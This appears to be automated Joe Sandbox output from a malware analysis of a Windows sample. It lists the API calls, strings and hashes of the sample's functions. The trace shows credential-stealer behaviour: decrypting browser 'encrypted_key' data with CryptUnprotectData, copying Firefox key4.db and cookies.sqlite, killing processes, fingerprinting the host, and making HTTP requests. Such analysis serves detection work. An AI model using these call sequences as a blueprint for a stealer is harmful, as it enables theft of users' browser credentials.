                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET ref: 004042E1
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,https), ref: 004042F4
                                                                                                                                                                                                                                                                                                  • InternetConnectA.WININET ref: 0040432D
                                                                                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00404360
                                                                                                                                                                                                                                                                                                  • InternetSetOptionA.WININET(00000000,0000001F,FFFFFFFF,00000004), ref: 00404387
                                                                                                                                                                                                                                                                                                  • HttpSendRequestA.WININET ref: 0040439B
                                                                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004043B3
                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004043F0
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040446D
                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00404478
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internet$Http$CloseHandleOpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: ERROR$GET$HTTP/1.1$https
                                                                                                                                                                                                                                                                                                  • API String ID: 1693188093-2961588264
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2e2f3eead9419f441d624b4b2d1e8f2e1cd83a2dda5262dd01751a01b6ddd133
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3507938dcee9cc1a0527973a4bd5b6eba6c84462808e0f35a45f5f60c0c7131e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e2f3eead9419f441d624b4b2d1e8f2e1cd83a2dda5262dd01751a01b6ddd133
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D451D771A00319ABDB10DFA4DC85FFF7779AF84704F00452AFA05A7281DB78A985CBA5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004115B0: LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,00000000,?,?,?,00000000), ref: 0040794C
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,-00000010,0041FE20,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040796B
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00407999
                                                                                                                                                                                                                                                                                                  • CryptUnprotectData.CRYPT32 ref: 00407AFA
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00407B13
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 00407B39
                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00407BC2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Local$Alloc$File$Freelstrlen$CloseCreateCryptDataHandleReadSizeUnprotectlstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: "encrypted_key":"$AES$ChainingMode$ChainingModeGCM$DPAP$_key.txt
                                                                                                                                                                                                                                                                                                  • API String ID: 72760943-530840575
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,0042119A,?,?,0042150A), ref: 004094C5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042150A), ref: 004113D8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004113B0: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0042150A), ref: 0041143E
                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004095D2
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: CreateFileA.KERNEL32 ref: 004076EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: GetFileSizeEx.KERNEL32(00000000,?), ref: 00407700
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: LocalAlloc.KERNEL32(00000040,003694E8), ref: 00407723
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: ReadFile.KERNEL32(00000000,A075FFA4,003694E8,?,00000000), ref: 00407744
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: LocalFree.KERNEL32(A075FFA4), ref: 00407763
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004076B0: CloseHandle.KERNEL32(00000000), ref: 0040776C
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 00409766
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Filelstrcpy$Locallstrcatlstrlen$AllocCloseCopyCreateFindFirstFreeHandleReadSizeSystemTimestrlen
                                                                                                                                                                                                                                                                                                  • String ID: C:\ProgramData\$\key4.db$cookies.sqlite
                                                                                                                                                                                                                                                                                                  • API String ID: 621517324-1530792146
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0094addd846d71e39c1ca082329bb6913a67108e446e9512760ecdb6ec231e4e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 855358d25c22b69566fbc42c17e74533ab55524d0b71b666bfbe4b79f85c7bd2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0094addd846d71e39c1ca082329bb6913a67108e446e9512760ecdb6ec231e4e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CC1B631A102189BCF14EBB1CC95AEE7779AF44304F44005EF80667292DB7C6EC5CBA9
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411FB6
                                                                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,00000128), ref: 00411FC4
                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00411FD0
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00411FF1
                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00411FFE
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?), ref: 0041200A
                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041201E
                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041202D
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00412036
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3836391474-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 73d56ab98b17da3653dff67e089b2de93a438a2d9c22f275f8cd819916ddfa29
                                                                                                                                                                                                                                                                                                  • Instruction ID: 924cd2998aa8e6582c44da8d0305fac9719003efd41fa9ed3311d7015259d757
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 73d56ab98b17da3653dff67e089b2de93a438a2d9c22f275f8cd819916ddfa29
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B115231104305AFD3201F61BD0CFAFBAADEBC9785F04501DFA45D62A0DF79A851CAA9
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000,0042150A), ref: 00410A11
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00410A23
                                                                                                                                                                                                                                                                                                  • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410A2D
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000200), ref: 00410A4D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411270: memset.MSVCRT ref: 00411281
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000000,00000200,?,?,?), ref: 00410AB4
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 00410B18
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$InfoKeyboardLayoutListLocalLocale$AllocFreelstrcatlstrlenmemset
                                                                                                                                                                                                                                                                                                  • String ID: /
                                                                                                                                                                                                                                                                                                  • API String ID: 2580590304-4001269591
                                                                                                                                                                                                                                                                                                  • Opcode ID: 47d8d58765390bafa4d4b739f7cf5a28c409f74912168362484b764a7be3d9a5
                                                                                                                                                                                                                                                                                                  • Instruction ID: eea5c3a77f3b4bcccf0633d63ef4e7b0d3230a8af430361ee2a26d3609cb3d8b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47d8d58765390bafa4d4b739f7cf5a28c409f74912168362484b764a7be3d9a5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5831A8313043186BD7106B919C89FAF779DEB85748F00051EF9469B291DABCAD8487A9
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 00412065
                                                                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 00412071
                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 0041207D
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 00412091
                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 00412099
                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 004120B6
                                                                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 004120C5
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,0000001C,0042150A), ref: 004120CE
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3836391474-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: a0b7ef02e1583a47d1d21b47bccce1f0927895e069a30e1cc4337bfc16cdf067
                                                                                                                                                                                                                                                                                                  • Instruction ID: 36dad1cb0fcbca0ffdfdd7c06b199559f2c5def7befbfc21f7e452e0f853ed5d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0b7ef02e1583a47d1d21b47bccce1f0927895e069a30e1cc4337bfc16cdf067
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93017571201214AFE7205B20BD48FBFBEADEF85781F14151DF605D6190CBA99CA1C6BA
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,00403103,00000000,00000000,?,?,?), ref: 004116E9
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 004116FC
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 00411706
                                                                                                                                                                                                                                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0041171D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00411733
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00411741
                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?), ref: 0041174B
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$BinaryCryptProcessString$AllocateErrorFreeLast
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 798923657-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 337ad27f9ad8079b430cc19cc8451ae19a993c84305c3c21a313def544d549b9
                                                                                                                                                                                                                                                                                                  • Instruction ID: b00e23e61dcd96af2d5a42df421a2e3100774d4436a7fe2bda2c6e10979a2865
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 337ad27f9ad8079b430cc19cc8451ae19a993c84305c3c21a313def544d549b9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C114575204202AFE7208F25EC44F67BBA9EF88700F15081DF6A2973A0DB75EC41CBA5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,00421509,?,?,?,?,?,?,AV: ,?,?,00421509,?,?,?), ref: 0041099D
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004109AB
                                                                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004109B2
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004109DC
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                                                                                                                                                  • String ID: wwww
                                                                                                                                                                                                                                                                                                  • API String ID: 362916592-671953474
                                                                                                                                                                                                                                                                                                  • Opcode ID: d02d355f946309d5fb77ffe609dd2dd317ed8e5471a32a046b4ab4715d77f78c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9378462ab9666fb6dba0cc2dba94d0b141e63b92265a990e46b9389926462d0e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d02d355f946309d5fb77ffe609dd2dd317ed8e5471a32a046b4ab4715d77f78c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5F02BB1B001105BE704573CBC0AB6A365A4BC6314F1A8225F591DF3E4DE749C5187C5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00411EE5
                                                                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 00411EF1
                                                                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 00411F12
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?), ref: 00411F1E
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00411F2F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 234b9e45be6b4865743ac96729f42ba8cccf2db60987f779249a5982b7c5a760
                                                                                                                                                                                                                                                                                                  • Instruction ID: 12a5467778ca0c5a55c84e6a3ebf7af38e155dcebc9527c53f9d4ce48d6bebb5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 234b9e45be6b4865743ac96729f42ba8cccf2db60987f779249a5982b7c5a760
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 33F06D312052156BE3201B22EC08FABBBECEF86795F04142DF549D6260DB289852C7B5
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407060: strlen.MSVCRT ref: 0040708A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407060: strlen.MSVCRT ref: 004070EB
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,00000000), ref: 00407009
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00407041
                                                                                                                                                                                                                                                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00407059
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: strlen$??3@FileFindFirst_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                                  • String ID: \LOCK
                                                                                                                                                                                                                                                                                                  • API String ID: 3598502236-2879356017
                                                                                                                                                                                                                                                                                                  • Opcode ID: 952b9b43d773132738958d387f29db73d7e192de4124f97fd59f734c76a160b2
                                                                                                                                                                                                                                                                                                  • Instruction ID: f44c4d4fe338d5c98bb0dd275f70c49df30f8ba6c2b9d28de0915081bc548b38
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 952b9b43d773132738958d387f29db73d7e192de4124f97fd59f734c76a160b2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAF0D631D1811187DB1876799D45A6F72919F42730F540B3FF566B72C1E239BC80428B
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F,?,0042035D), ref: 004108E2
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,00401135,?,0042095F,?,0042035D,?,00420C67,?,00420449,?,0042060F), ref: 004108F0
                                                                                                                                                                                                                                                                                                  • GetComputerNameA.KERNEL32(00000000), ref: 00410903
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
